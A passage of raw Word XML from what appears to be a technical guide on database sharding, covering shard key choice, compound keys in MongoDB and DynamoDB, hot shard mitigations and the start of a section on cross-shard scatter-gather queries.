            <w:r w:rsidRPr="00875520">
              <w:t>Skewed (US dominates)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1CA098" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Moderate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49A8B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:t xml:space="preserve"> Hot shard for popular countries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="0156208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11C630" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>created_at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ECE6FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Sequential (hot shard for "now")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668A06" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Low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C9C34D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:t xml:space="preserve"> All writes hit latest shard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4D82FAF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2A33A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">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0B92DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Very low cardinality (3–5 values)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0DF264" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Low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18B275" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
              </w:rPr>
              <w:t>✗</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:t xml:space="preserve"> Terrible (only 3–5 possible shards)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34E27BA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-tenant SaaS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE3F55" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC08A48" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Best shard key: tenant_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17859CF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - All queries are tenant-scoped (natural affinity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE2602D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Each tenant's data is co-located (JOINs within tenant are local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36909902" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Natural isolation (one tenant's load doesn't affect another's shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644AA28A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A668B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Challenge: "elephant tenants" (one tenant has 100x more data than others).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274CB73E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Solution: Large tenants get dedicated shards. Small tenants are packed together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E89B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Social media:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F95C9D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CCB7D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard key: user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C775D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - User profile queries: single shard ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FFB30F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - User's posts: single shard ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A852204" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - User's feed: requires fan-out to friends' shards </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve"> (cross-shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076A595" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Global trending: cross-shard aggregation </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB0C76" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9E1B5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Trade-off: user-centric queries are fast, global queries are expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4CA98" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Solution: Separate systems for feed generation (pre-computed) and trending (analytics pipeline).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCD3483" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Compound Shard Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6452D8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When a single column doesn't suffice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CAE65C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F4329C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>MongoDB compound shard key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4666AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  sh.shardCollection("db.events", { tenant_id: 1, timestamp: 1 })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DE2383" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1A052D90" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>This means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1A00A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  First: group by tenant_id (all events for a tenant are near each other).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60557859" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Within a tenant: ordered by timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6CA92" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC60D85" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Query: { tenant_id: "acme", timestamp: { $gt: "2024-01-01" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18016FED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Routes to specific shard(s), range scan within tenant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F8AF4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DynamoDB composite key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF25A6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5883F2BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partition key: customer_id (determines shard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904597C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sort key: order_date (determines order within partition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E9CA8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="220C81A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>All orders for a customer are on the same shard, sorted by date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D5C15F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: customer_id = "X" AND order_date BETWEEN "2024-01" AND "2024-06" → efficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27684915" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 The Hot Shard Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C86FDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> One shard receives disproportionate traffic despite seemingly good distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327844D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF56729" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Celebrity problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> One user has millions of followers → their shard handles all read traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43836A2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Viral content:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> One post goes viral → all reads hit the shard containing that post.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D6232" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Temporal hotspot:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Range-sharded by time → current shard handles all writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FCD8D5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1557"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Skewed data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> One tenant has 50% of all data → one shard is enormous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C170D7D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6D5165" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Add randomness to hot keys (scatter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD8907F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C14E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Instead of shard_key = user_id for celebrity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2AC7AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>shard_key = user_id + "_" + random(0, 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403ADE96" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2D79F6E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Spreads the celebrity's data across 10 shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B012680" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Reads require scatter-gather across those 10 sub-shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362ED3A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Trade: write distribution improved, read complexity increased.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A1DEF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Dedicated shard for hot entities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB2E1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43851C00" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Celebrity user_id = 12345:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64900370" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Route to dedicated shard (over-provisioned, optimized for this workload).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0DEEB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Other users: normal hash sharding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D4A12E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Caching layer in front of hot shard:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C384A4F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687A86B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hot reads for celebrity → served from cache (Redis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54E40B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard only handles writes + cache misses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBD454C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Rate limiting / queuing for hot writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04186382" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE1F1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Burst of writes to hot shard → queue absorbs burst → drain to shard at sustainable rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC4771" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="4BBD1948">
          <v:rect id="_x0000_i5761" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="137DA4D4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Cross-Shard Operations — The Hard Problems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56290645" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Cross-Shard Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE27A2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Data needed for a query spans multiple shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51760CE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8E962" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: SELECT * FROM orders WHERE order_date &gt; '2024-01-01' ORDER BY total DESC LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E1FAD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="25923034" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If sharded by customer_id:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744FF435" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - order_date and total are on EVERY shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5893BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Must query ALL shards, get top 10 from each, merge results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73285E26" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - "Scatter-gather" pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB0C340" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scatter-gather:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3F5A60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7ACC8C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Application/Router:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505EF21" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Send query to ALL N shards in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3776B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Each shard returns its local result (e.g., top 10).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F900B7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
